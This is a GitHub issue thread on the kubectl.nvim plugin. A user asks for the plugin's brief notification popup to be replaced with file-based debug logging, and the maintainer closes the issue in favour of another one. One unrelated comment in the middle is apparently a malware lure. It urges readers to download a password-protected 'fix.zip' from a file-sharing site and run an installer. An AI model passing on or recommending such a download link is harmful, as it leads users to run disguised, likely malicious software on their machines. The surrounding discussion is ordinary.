### ISSUE TITLE
Refactor/remove notifications

### ISSUE THREAD

**Issue by mosheavni** [Ramilito/kubectl.nvim#248]
https://github.com/mosheavni/kubectl.nvim/blob/main/lua/kubectl/notification.lua

I tried to play with it, the view is really small, cannot see any relevant data in it, it disappears fast.
I think it's better to implement some logging mechanism, writing log lines to a file.
alot of times when I debug my side-branch, I have to add bunch of prints on `commands.shell_command_async()` to see what action was performed.
I'd essentialy enable debugging and then just read an external file for the plugin prints.
we can also add bunch of more debug prints after that is done.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ramilito** [comment]
Yeah the notification is really one to show that things are happening, there is an issue that is closer to what you are requesting #21.

I feel that they shouldn't be the same solution

**Comment by Ramilito** [comment]
Closing this in favor of #21
